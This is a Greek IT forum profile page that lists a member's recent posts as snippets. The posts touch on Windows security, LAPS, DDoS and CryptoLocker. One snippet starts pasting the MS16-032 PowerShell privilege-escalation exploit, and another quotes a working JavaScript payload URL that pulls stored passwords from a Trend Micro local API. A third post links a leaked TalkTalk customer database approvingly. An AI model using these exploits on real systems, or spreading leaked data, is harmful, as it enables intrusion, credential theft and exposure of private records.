Jump to content

kavasilop

Members
  • Content Count

    20
  • Joined

  • Last visited

  • Days Won

    6

kavasilop last won the day on April 27 2016

kavasilop had the most liked content!

About kavasilop

  • Rank
    Junior IT
  1. To patch ειναι : https://technet.microsoft.com/en-us/library/security/ms16-032.aspx Για να δουμε αν εχουμε το patch : wmic qfe | find "KB3139914" function Invoke-MS16-032 { <# .SYNOPSIS PowerShell implementation of MS16-032. The exploit targets all vulnerable operating systems that support PowerShell v2+. Credit for the discovery of the bug and the logic to exploit it go to James Forshaw (@tiraniddo). Targets: * Win7-Win10 & 2k8-2k12 <== 32/64 bit! * Tested on x32 Win7, x64 Win8, x64 2k12R2 Notes: * In order for the race con
  2. "θεωρώ ότι αυτοί πρέπει να είναι ιδιαίτερα απαιτήτικοί στο κομμάτι της ασφάλειας διαφορετικά δεν θα γινόταν αποδεκτή η λύση, μιλάμε για τράπεζες και τεράστιους οργανισμούς με απίστευτες απαιτήσεις." Σαν θεωρημα καλο ειναι στην πραξη κολαει απο παντου ομως...
  3. Το cryptolocker απλα θα παρει το αρχειο και θα το κανει encrypt . Γιαυτο το πραγμα δεν χρειαζετε να ανοιξεις το αρχειο. αν εχω πχ ενα εγγραφο και θελω να το κανω encrypt με PGP δεν χρειαζετε να το ανοιξω.....
  4. Αυτο παντος ειναι πολυ καλο "This will get you all the encrypted passwords, for example, this will show the domain of the first encrypted password:" https://localhost:49155/api/showSB?url=javascript:topWindow.process.mainModule.exports.Tower.handle.getUserData(function(n){alert(JSON.parse(n).data.passcard[0].Domain)})'
  5. Γιατι να μην μπορει??? Το cryptolocker δεν 8α ανοιξει το αρχειο..
  6. Οσοι απο εσας εχετε Trendmicro παρακαλω διαβαστε το παρακατω αρθρο.... https://code.google.com/p/google-security-research/issues/detail?id=693
  7. Πριν λίγο καιρό η TALK TALK στην αγγλία έπεσε θύμα hackers...Και όπως γίνετε σε αυτές τις περιπτωσεις η database γίνετε leak κάποια στιγμή.... http://siph0n.in/exploits.php?id=4366 Enjoy!!!
  8. Όταν αποθηκεύεις σε plaintext τα passwords τότε δεν υπάρχει "e και"..Ακόμα και όταν είσαι admin, εδώ κολλάει το σχόλιο σου "κάτι γίνετε λάθος". Για το δεύτερο δεν είμαι σίγουρος αλλα σχόλια στο internet που έχω διαβάσει αυτό λένε...Όταν έχεις πολλά μηχανήματα νομίζω ότι το "xερατo" το ξεχνάς και ψάχνεις μια λύση που θα σε κάλυψη...Σε μεγάλες εταιρίες/οργανισμούς υπάρχουν αρκετά μηχανήματα που μπορεί να έχεις παραπάνω από δυο admin. Συνφωνω μαζί σου αλλα καμια φορα δεν γίνετε αλλιώς... Update-PasswordArchive.ps1 #############################################################################
  9. LAPS 1) αποθηκεύει τους κωδικούς πρόσβασης plaintext στο Active Directory database, και χρησιμοποιεί AD permissions για να περιορίσει την πρόσβαση στα passwords, 2) απαιτεί update στο Active Directory schema, 3) απαιτεί Group Policy client-side extension (an MSI package) σε ολους τους managed hosts, 4) δεν παιζει για stand-alone servers η workstations λογο Active Directory and Group Policy components, 5) μπορεί να χρησιμοποιηθεί μόνο για να διαχειριστεί το πολύ δύο local user accounts σε καθε μηχανημα, οχι παραπανω 6) εννοειτε πως δεν εχουμε τον πηγαιο κωδικα για να κανουμε αλλαγες (C++ source
  10. μαλλον φιλε θα θύμωσε που του περασες τα 10.... :P
  11. Για να πεσει ενα ebanking η ενα www τα 5 και τα 9 ειναι πολλα.... ΥΠ. αλλο πραγμα η αμαζον....
  12. Τα attacks ειναι layer3 πιο πολυ και το botnet ειναι τεραστιο.... "απλά νορμάλ σε θέματα πακέτων" με αυτο blackman τι εννοεις ?
  13. Οταν σου στελνουν 5 Gigabit sustained traffic per second ειναι δυσκολο για ολους....εχει σημασια να δουμε σε τι layer δεχονται το DoS....αναμένουμε...
  14. Απο περιέργεια ρωταω για πιον λογο θελεις να ελενχεις το UAC ???? Το ρωταω μιας και σε ολες τις εκδοσεις των Windows γινετε bypass οποτε τι ειναι αυτο που θα ηθελες να βλεπεις ???.....
×
×
  • Create New...